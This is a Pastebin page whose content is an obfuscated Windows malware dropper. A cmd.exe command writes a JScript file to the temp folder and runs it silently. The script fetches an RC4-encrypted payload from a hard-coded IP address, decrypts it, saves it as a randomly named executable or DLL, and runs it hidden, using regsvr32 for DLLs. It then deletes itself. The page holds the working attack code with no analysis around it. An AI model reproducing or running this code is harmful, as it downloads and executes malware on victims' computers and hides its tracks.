Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- cmd.exe /q /c cd /d "%tmp%" &&
- echo /**/function V(k)
- {var y=a(e+"."+e+/**/"\x52equest.5.1");
- T="G";y["se"+"tProxy"](n);
- y["ope"+"n"](T+"ET",k(1),1);
- y["Option"](n)=k(2);
- y.send();
- y["Wai"+"tForResponse"]();
- W="respo"+"nseText";
- if(40*5==y.status)return _(y[W],k(n))};
- function _(k,e)
- {
- for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)
- c[b]=b;ta="charCodeAt";
- for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;
- for(var p=l=b=0;
- p^<k.length;
- p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));
- return q["join"]("")};
- try{M="WSc";
- u=this[M+"ript"],o="Object";
- P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADODB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);
- C=" /c ";
- s.Close();
- i="regs";
- z^&^&(x=i+"vr32"+E+" /s "+x);
- j["run"](Z+E+C+x,0)}catch(EEEEE){};
- q[U](K);
- >u32.tmp &&
- start wscript //B //E:JScript u32.tmp "uDoW4P6LPK" "http://92.53.127.101/?NDI0MjA0&[REDACTED]" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
